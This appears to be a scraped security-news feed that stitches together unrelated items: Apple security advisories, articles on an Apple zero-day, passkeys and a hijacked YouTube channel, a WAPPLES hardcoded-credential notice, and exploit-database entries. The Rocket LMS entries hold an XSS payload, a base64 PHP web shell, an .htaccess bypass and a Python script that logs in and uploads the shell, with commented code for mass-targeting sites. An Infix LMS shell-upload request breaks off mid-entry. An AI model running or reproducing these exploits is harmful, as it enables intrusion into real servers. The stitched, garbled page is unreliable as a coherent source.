WAPPLES through 6.0 has a hardcoded systemi account accessible via db/wp.no1 (as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file). A threat actor could use this account to access the system configuration and confidential information (such as SSL keys) via an HTTPS request to the /webapi/ URI on port 443 or 5001.

**

The Logical Web Application Firewall for protecting web applications hosted on Azure

**

With the largest market share in the WAF market of Asia Pacific, WAPPLES’ customers include some of the largest in the finance, public, and commercial sectors.  
WAPPLES protects applications from attacks that exploit both known and zero-day vulnerabilities. From Application-layer DoS to SQLi and XSS, WAPPLES is effectively covers all OWASP top 10 risks.  
With an intuitive GUI that is easy to learn and use, WAPPLES allows for quick deployment within a few steps. All VMs can be configured and monitored through one central management console. Online customer support is available at all times.

WAPPLES SA v6.0 is extremely versatile, where security policies include a selection of 32 configurable logic-based detection rules, specifically tailored to protect against web attacks. It is deployable in reverse proxy, inline, and high availability modes. Even reports are customizable.  
The AI-based COCEP engine allows automatic detection of known and zero-day attacks, resulting in high accuracy and low false-positives.  
Fully integrated to Azure, WAPPLES offers a wide range of additional services such as load balancing and data loss prevention, helping users make the most out of their Azure experience.  
WAPPLES SA is available in the following languages: English, Korean, Japanese, Russian, and Ukrainian.

Please contact the corresponding region for inquires:  

*   Korea: cloud@pentasecurity.com
*   Japan: japan@pentasecurity.com
*   Global: globalbiz@pentasecurity.com

CVE-2022-35413: Microsoft Azure Marketplace

Apple Security Advisory 2022-09-12-5 - Safari 16 addresses buffer overflow, code execution, out of bounds read, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-09-12-5 Safari 16

Safari 16 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213442.

Safari Extensions  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to track users through Safari web  
extensions  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 242278  
CVE-2022-32868: Michael

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer, afang5472, xmzyshypnc

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with  
Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243236  
CVE-2022-32891: @real_as3617, an anonymous researcher

Safari 16 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmMfdgMACgkQ4RjMIDke  
Nxk7dRAAgdvFNEmEdfhDdLWbn7ZIdNrxPZDsg1MiCVFyPvPesNRo3Uj+XI2m93E4  
U7koTDn7+DE62TjkdNEqOQ0bXpy84uWAcZoZDmGJOt0IQOPwcMf8CMzhj/GytrTt  
PCC2IjWDuoJsoQ9lIm71WN3nsfrpO/P4cO04H3Tw4CxFI9Oj0doALGvamf0XVYCN  
TyCdw15kQ+WTriI5rnzsE4qqh4vaEKeuyEiZQzR26p3ctpT+inffGz6g9uYgy5AW  
v1Kwln7DDSIvYyAcrIyPKqwjsdfD6dmnufKTSUkOHLOpvqx5P/PLQ9f4qv3VXy6c  
Bs4eLUUvONzxoo07TB3V3/OsC1eQwDnPugrja5SFTgZUpl9QM7PMijoOar7Y11JL  
fMgJArHEDWB4JatejBrgsBps+SU2ozSAaT71hfm77Jb1TSSRDuxX2po2AjiwKOcF  
S+T2yJSIgI5nsP9i1RRG3+hN6MOUKKmFxlWxXPLdCO4pG04qdmMOE5HR2bRgQ3/o  
gdRb/OYTQkchSlhbpvdF8zO0QZLXh+GeiLxWoygfbQQmv33KeKRlrbKVctyB4HQZ  
ZxTi0Tn5pfdnuB2QvGn6b0KZZJlDHkiiNj3grvD5uFSH6H0MV7apLiJ636qEL/Tp  
o8PWQgop+KfYatZDVAQMYekpRYwz7oDdFm/i6SYvnP09wx55Ooc=+qsX  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-09-12-5

Apple Security Advisory 2022-09-12-4 - macOS Monterey 12.6 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-09-12-4 macOS Monterey 12.6

macOS Monterey 12.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213444.

ATS  
Available for: macOS Monterey  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32902: Mickey Jin (@patch1t)

iMovie  
Available for: macOS Monterey  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-32896: Wojciech Reguła (@_r3ggi)

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32911: Zweig of Kunlun Lab

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32917: an anonymous researcher

Maps  
Available for: macOS Monterey  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32883: Ron Masas, breakpointhq.com

MediaLibrary  
Available for: macOS Monterey  
Impact: A user may be able to elevate privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-32908: an anonymous researcher

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to gain elevated privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32900: Mickey Jin (@patch1t)

Additional recognition

Identity Services  
We would like to acknowledge Joshua Jones for their assistance.

macOS Monterey 12.6 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmMfdoAACgkQ4RjMIDke  
NxkI5g//SbLPARNJZkH5CzD60NB87QymxWmpvPcbPiywLpVy8Yj7CzQ21rM7cshx  
65LXO+4S5dIkWSv38lv7o+JOTuhPxnucdR9EhPN4Mjyl132S9zOylgaotp0/LZuJ  
vGOzN1LUO260VeB/4wpnWM5wQY5b16GGrIj1LJ1knKKNB05/JdBEHC0fXhPgIZ0A  
fOcQzNVaeySayjx4mariluq0GBXKQ9ELPEhS+z1XCEg6Rw1NLS0cC1mhGoXojRYF  
Bij2De+JBEFqtGTo4ceN52yBmUj4UF11zJPl3fybJIM1dmkRd0/7PpsqJmEiASWr  
cmCsY4DiMbFVPnpHKv8dkt4dNseejGntpEsHljlq6rATLSbGkTowwRtaF8QtgZzT  
wS3mAWlit6vjiMQlgMVLnDk72IGVqaIcu2JmIJtfLFDgXPctO64ZAvbWDPeCyNfe  
+6hnVv/sWzFh6dHh+kJYwDrMIxZnFZuZD1NzaHqxEPKUY9CdK8GhNzwVfOPzlP3U  
TfOaZGuyudXKn7k04ItHBPtq5P+oYDPDlfIzeP8n+WYLbUCP+a1A8yrqQnQuY1Rs  
N3cz70al/9ogGzamSCIe0jQxGrVaMgvd8GEDK9GnksRxd0vJl/rMm05wruOyv2pD  
gEhw6ZdE97icESMAOvPMjIR0eANuiK6vgyrg+GRn2RSqLpsr1VM=  
=qtyT  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-09-12-4

Rocket LMS version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04-------Request-----------GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21--Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3DConnection: close

Rocket LMS 1.6 Cross Site Scripting

Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket:    def __init__(self,ssl,host,port,email,password,file):        self._url_to_upload = "/panel/setting"        self._url_to_login = "/login"        self.host = host        self.port = port        self.ssl = ssl        self.email = email        self.password = password        self.file = file    def get_csrf_token(self,client,URL):               fromt = client.get(URL)          if 'XSRF-TOKEN' in client.cookies:                csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]            return csrftoken        else:               print("Error while fetching token")            return    def login(self):        client = requests.session()        if self.ssl == True:            ssl= "https://"        else:            ssl= "http://"        URL = str(ssl+self.host+":"+self.port+self._url_to_login)        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)        csrftoken = self.get_csrf_token(client,URL)        fromt = client.get(URL)  # sets cookie              login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')        r = client.post(URL, data=login_data, cookies=client.cookies)                   self.upload_shell(client,URL2)        self.upload_htaccess(client,URL2)    def upload_shell(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)        with open(self.file,"r") as payload:            to_base64 = payload.read()                         to_base64 = str(to_base64).encode("utf-8")            base64_encoded_data=  base64.b64encode(to_base64)            base64_encoded_data = str(base64_encoded_data)[:-1]            base64_encoded_data = str(base64_encoded_data)[2:]                        string = "data:image/php;base64,"+str(base64_encoded_data)            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")            r = client.post(URL, data=data, cookies=client.cookies)            print(r.status_code)            if r.status_code == 200:                print("sent and uploaded shell :"+URL+"\n")            else:                 print("couldn't upload shell")         def upload_htaccess(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)           string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")        r = client.post(URL, data=data, cookies=client.cookies)        print(r.status_code)        if r.status_code == 200:            print("sent and uploaded htaccess:"+URL+"\n")            print("Go and rename file in filemanager on website")        else:             print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:#     with open("sites.txt","r") as urls:#         url = urls.readlines()#         ssl = True#         port = 443#         for line in url:            #             try:#                 if "sslyok" in line:#                     port = 80#                     ssl = False#                 line = str(line.rstrip('%0a'))                #                 print("trying:"+line)#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")#                 elon.login()#                 time.sleep(1)    #             except Exception:#                 #traceback.print_exc()#                 print("atamadim")                #             finally:#                 print("okey")# except Exception:#                 print("atamadim")

Rocket LMS 1.6 Shell Upload

Categories: Exploits and vulnerabilities
Categories: News
Apple has patched an actively-exploited flaw that affects a host of devices and software, including iPhones, Macs, iPads, and iPod touch.



(Read more...)




The post Important update! iPhones, Macs, and more vulnerable to zero-day bug appeared first on Malwarebytes Labs.

Posted: September 13, 2022 by

On Monday, Apple released a long list of patched vulnerabilities to its software, including a new zero-day flaw affecting Macs and iPhones. The company revealed it's aware that threat actors may have been actively exploiting this vulnerability, which is tracked as **CVE-2022-32917**.

As it's a zero-day, nothing much is said about CVE-2022-32917, only that it may allow malformed applications to execute potentially malicious code with kernel privileges. Apple says it's patched this flaw with improved bounds checks. Below is a list of products this bug affects:

*   Macs running macOS Monterey 12.6 and macOS Big Sur 11.7
*   iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

CVE-2022-32917 is the eighth zero-day flaw that Apple has addressed since the beginning of 2022. The first seven are as follows:

*   CVE-2022-32894, a flaw in the iOS Kernel, was patched in August
*   CVE-2022-32893, a flaw in WebKit, was patched in August
*   CVE-2022-22674, an Intel Graphics Driver bug, was patched in March
*   CVE-2022-22675, a bug in AppleACD, was patched in March
*   CVE-2022-22620, a WebKit bug affecting iPhones, Macs, and iPads, was patched in February
*   CVE-2022-22587, a privileged code execution flaw, was patched in January
*   CVE-2022-22594, a web browser activity tracking flaw, was patched in January

As this latest vulnerability is already being exploited, it's really important that you update your devices as soon as you can. Stay safe!

**RELATED ARTICLES**

**ABOUT THE AUTHOR**

Important update! iPhones, Macs, and more vulnerable to zero-day bug

Categories: Apple
Categories: News
With the introduction of passkeys in iOS 16 and macOS Ventura, Apple is poised to sway a trend against the use of passwords.



(Read more...)




The post Apple puts the password on life support with passkey appeared first on Malwarebytes Labs.

Posted: September 13, 2022 by

The "passwordless future" is something many internet users—and a great majority of the cybersecurity industry—have hoped for. Now Apple is about to make those hopes a reality.

With the release of iOS 16 yesterday, and macOS Ventura next month, Apple fans will be able to use passkeys, its password replacement, for iPhones, iPads, and Macs. The word "passkey" is not unique to Apple, however. Microsoft and Google are using the term, too.

Apple's passkey works like a password in that it is built into entry boxes where you put your password. It also acts as a digital key that users create to access their apps or websites.

A video demonstrating passkey's use in Apple's WWDC 2022 event shows a prompt on the user's device before sign-in or during account creation, asking if they would like to "save a passkey" for the account in use. Once users say yes, they are prompted to authenticate the passkey creation using Face ID, Touch ID, or another method. The created passkey is stored in the user's iCloud Keychain and synced across all Apple devices and Safari web browsers.

Whenever a passkey is created, the device's system creates a pair of digital keys: public and secret keys. According to Garrett Davidson, an Apple engineer, in the demo video, these keys are created "securely and uniquely" for every account. The public key is stored on Apple's servers, while the secret key is kept on the device.

When signing in to an account protected by a passkey, the website or app looks for the secret key kept safe on the device to prove that the user is who the user claims they are. And because Apple's passkey is based on passwordless standards defined by the FIDO Alliance, it's likely the passkey can be stored anywhere, including some password managers with a provision for the passkey, such as Dashlane.

Those with other devices besides Apple can still take advantage of passkey. However, how things are done is slightly different because passkeys won't be stored on non-Apple devices. For example, accessing a browser account on a Windows machine would require a user to use a QR code containing a URL to a single-use encryption key and their iPhone. Once scanned, the machine and the device can communicate using end-to-end encryption via Bluetooth and share information.

"That means a QR code sent in an email or generated on a fake website won't work, because a remote attacker won't be able to receive the Bluetooth advertisement and complete the local exchange," Davidson said in the video.

"This has the potential to be _far_ superior to weak passwords and chosen by people who don't use a password manager or don't know how to choose a password," said Thomas Reed, Malwarebytes' Director for Mac & Mobile. "So even if this isn't 100% perfect, it's still going to be better than what most people are doing today."

**RELATED ARTICLES**

Apple puts the password on life support with passkey

Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild.
The issue, assigned the identifier CVE-2022-32917, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges.
"Apple is aware of a report that this issue may

Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild.

The issue, assigned the identifier **CVE-2022-32917**, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges.

"Apple is aware of a report that this issue may have been actively exploited," the iPhone maker acknowledged in a brief statement, adding it resolved the bug with improved bound checks.

An anonymous researcher has been credited with reporting the shortcoming. It's worth noting that CVE-2022-32917 is also the second Kernel related zero-day flaw that Apple has remediated in less than a month.

Patches are available in versions iOS 15.7, iPadOS 15.7, iOS 16, macOS Big Sur 11.7, and macOS Monterey 12.6. The iOS and iPadOS updates cover iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

With the latest fixes, Apple has addressed seven actively exploited zero-day flaws and one publicly-known zero-day vulnerability since the start of the year -

*   **CVE-2022-22587** (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-22594** (WebKit Storage) - A website may be able to track sensitive user information (publicly known but not actively exploited)
*   **CVE-2022-22620** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-22674** (Intel Graphics Driver) – An application may be able to read kernel memory
*   **CVE-2022-22675** (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32893** (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-32894** (Kernel) - An application may be able to execute arbitrary code with kernel privileges

Besides CVE-2022-32917, Apple has plugged 10 security holes in iOS 16, spanning Contacts, Kernel Maps, MediaLibrary, Safari, and WebKit. The iOS 16 update is also notable for incorporating a new Lockdown Mode that's designed to make zero-click attacks harder.

iOS further introduces a feature called Rapid Security Response that makes it possible for users to automatically install security fixes on iOS devices without a full operating system update.

"Rapid Security Responses deliver important security improvements more quickly, before they become part of other improvements in a future software update," Apple said in a revised support document published on Monday.

Lastly, iOS 16 also brings support for passkeys in the Safari web browser, a passwordless sign-in mechanism that allows users to log in to websites and services by authenticating via Touch ID or Face ID.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases iOS and macOS Updates to Patch Actively Exploited Zero-Day Flaw

By Waqas
Scuba Jake, whose real name is Jake Koehler, had his YouTube channel "DALLMYD" with 13 million subscribers hacked to steal 1.01 BTC.
This is a post from HackRead.com Read the original post: Popular YouTuber Scuba Jake’s channel hacked to run crypto scam

YouTube is frequently targeted in hacks especially to carry out **crypto scams**. The severity of crypto scams on YouTube can be quantified by the fact that in July 2020, Apple co-founder **Steve Wozniak ended up suing** Google and YouTube over Bitcoin giveaway scams being carried out in his name.

Now, another viral YouTuber Jake Koehler (aka Scuba Jake) has suffered a similar hack in which his channel “**DALLMYD**” was compromised to run a crypto scam and steal funds from his subscribers.

It is worth noting that Jake’s channel has more than 13 million subscribers and boasts 1.75 billion views since its creation in 2011. The American YouTuber is known for uploading scuba-diving videos where he goes underwater on treasure hunts and finds/returns lost items including smartphones, gadgets, and jewelry.

Archive video of Scuba Jake’s YouTube channel

According to the financial news and crypto analysis blog **Finbold**, the hacking occurred on September 9th, 2022. Reportedly, crypto scammers hijacked the channel and tried to defraud innocent followers of Scuba Jake in a **fake giveaway scheme** involving cryptocurrencies Bitcoin and Ethereum.

What’s worse, apparently scammers managed to steal 1.01 BTC (around $21,000). This analysis was based on the QR codes scammers shared with users to scan before sending crypto.

On the other hand, a look at Blockchain.com confirms that the **scammers’ Bitcoin wallet** shared with users received four transactions, and since its creation, it has received around 1.0107 BTC. That’s the same amount the scammers stole from Jake’s subscribers, but it may be higher because the scammers might have used multiple wallets during the live stream. It is worth noting that no transaction was made in the **Ethereum** wallet.

Scammers also changed Jake’s channel name to MicroStrategy US to replicate the firm MicroStrategy, a USA’s crypto-friendly business intelligence firm. Scammers hosted two live streams of an old video showcasing ex-CEO of the company and Bitcoin enthusiast Michael Saylor.

The scammers deceived unsuspecting subscribers of Jake into sending cryptocurrency and receiving a prize or higher reward from Saylor. They targeted the channel because of Jake’s massive following.

Although Jake has already confirmed the hack on his Instagram story but at the time of writing his channel was unavailable to viewers. A search for his YouTube channel shows video collaboration with other YouTubers while his channel is nowhere to be found on YouTube.

1.  **Botnet found using YouTube to illegally mine cryptocurrency**
2.  **Popular YouTube gaming channel hacked to run crypto scam**
3.  **YouTube deletes 2 million channels and 51 million videos over scams**
4.  **YouTube scammers impersonated Elon Musk, SpaceX; stole $150k in BTC**
5.  **British Military’s Twitter and YouTube Accounts Hacked to Scam Crypto Users**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Popular YouTuber Scuba Jake’s channel hacked to run crypto scam

Infix LMS version 4.3.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Infix LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608# Version: 4.3.0# Tested on Ubuntu 18.04sign up as teachergo profile page and try to upload profile picwith bypass name restriction on post request with burp or etc, upload b374k with burp or else -------Request-----------POST /profile-update HTTP/1.1Host: localhostContent-Length: 102201Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzjX6L4V6hVC4KIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/profile-settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3DConnection: close------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="_token"0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; 